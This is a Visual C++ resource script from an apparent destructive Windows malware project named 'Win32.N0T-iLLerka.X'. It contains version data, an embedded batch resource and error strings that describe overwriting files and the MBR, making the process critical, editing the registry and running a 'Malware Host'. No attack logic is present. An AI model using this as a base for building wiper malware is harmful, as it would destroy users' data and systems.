// Microsoft Visual C++ generated resource script.
//
#pragma code_page(65001)

#include "../Header-Files/Sub-Headers/resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "winres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// English (United States) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE 
BEGIN
    "../Header-Files/Sub-Headers/resource.h\0"
END

2 TEXTINCLUDE 
BEGIN
    "#include ""winres.h""\r\n"
    "\0"
END

3 TEXTINCLUDE 
BEGIN
    "\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Version
//

VS_VERSION_INFO VERSIONINFO
 FILEVERSION 86,0,5,2
 PRODUCTVERSION 86,0,5,2
 FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
 FILEFLAGS 0x3L
#else
 FILEFLAGS 0x2L
#endif
 FILEOS 0x40004L
 FILETYPE 0x1L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "040904b0"
        BEGIN
            VALUE "FileDescription", "N0T-iLLerka.X [.niX] your File Killa] - (dev-VER)"
            VALUE "FileVersion", "0.5.2 _b-Release.1"
            VALUE "InternalName", ".niX"
            VALUE "LegalCopyright", "Lima X [L4X] / [G-C-E-R] © 2kl9"
            VALUE "OriginalFilename", "N0T-iLLerka.X"
            VALUE "ProductName", "Win32.N0T-iLLerka.X [.niX]"
            VALUE "ProductVersion", "0.5.2 _b-Release.1"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x409, 1200
    END
END


/////////////////////////////////////////////////////////////////////////////
//
// RT_RCDATA
//

IDR_RCDATA101           RT_RCDATA               "PEdelete.bat"


/////////////////////////////////////////////////////////////////////////////
//
// String Table
//

STRINGTABLE
BEGIN
    IDS_STRING101           "Couldn't parse Commandline"
    IDS_STRING102           "Couldn't copy current Module to target Path\nModule: %s\nTarget: %s"
    IDS_STRING103           "Couldn't set File Attributes"
    IDS_STRING104           "Couldn't generate Random Buffer Content\nusing ZeroMemory instead"
    IDS_STRING105           "Couldn't overwrite FileData"
    IDS_STRING106           "Couldn't allocate Buffer"
    IDS_STRING107           "Couldn't open existing File\n File: %s"
    IDS_STRING108           "Process isn't Administrator"
    IDS_STRING109           "Couldn't set Malware Host to High Priority\nRunning with Normal Priority"
    IDS_STRING110           "Malware Host is already running\n(Mutex already exist)"
    IDS_STRING111           "Couldn't create /host Mutex"
END

STRINGTABLE
BEGIN
    IDS_STRING112           "Malware Host failed to launch"
    IDS_STRING113           "Couldn't open Check-File"
    IDS_STRING114           "Couldn't format Warning-Message"
    IDS_STRING115           "Couldn't allocate Buffer in Heap"
    IDS_STRING116           "Couldn't copy Binary to target Path\nFile: %s\nPath: %s"
    IDS_STRING117           "Directory already exist\nPath: %s"
    IDS_STRING118           "Couldn't create target Directory\nPath: %s"
    IDS_STRING119           "Couldn't determin Drive type\nPath: %s"
    IDS_STRING120           "Couldn't enumerate Drives"
    IDS_STRING121           "Couldn't open Handle ""hFind"" to FirstFile\nFile: %s"
    IDS_STRING122           "Couldn't overwrite MBR"
    IDS_STRING123           "Couldn't open Handle ""hMbr"" to MBR"
    IDS_STRING124           "Failed to Generate Random Buffer"
END

STRINGTABLE
BEGIN
    IDS_STRING131           "Failed to raise HardError"
    IDS_STRING132           "Couldn't set Shutdwon Privileges"
    IDS_STRING133           "Couldn't set Process Critical"
    IDS_STRING134           "Couldn't set Debug Privileges"
    IDS_STRING135           "Couldn't open Registry Key"
    IDS_STRING136           "Couldn't set Registry Type/Value\nType: %d\nValue: %s 0x%X"
    IDS_STRING137           "Couldn't create Registry Key\nKey: %s"
    IDS_STRING138           "Couldn't lock Resource"
    IDS_STRING139           "Couldn't get size of Resource"
    IDS_STRING140           "Couldn't load Resource"
    IDS_STRING141           "Couldn't find Resource\nResourceID: %d\nResourceType: %s"
    IDS_STRING142           "Couldn't write Buffer to File"
    IDS_STRING143           "Couldn't create File\nFile: %s"
END

STRINGTABLE
BEGIN
    IDS_STRING144           "Couldn't create Heap"
    IDS_STRING145           "Couldn't Open Mutex"
END

#endif    // English (United States) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//


/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

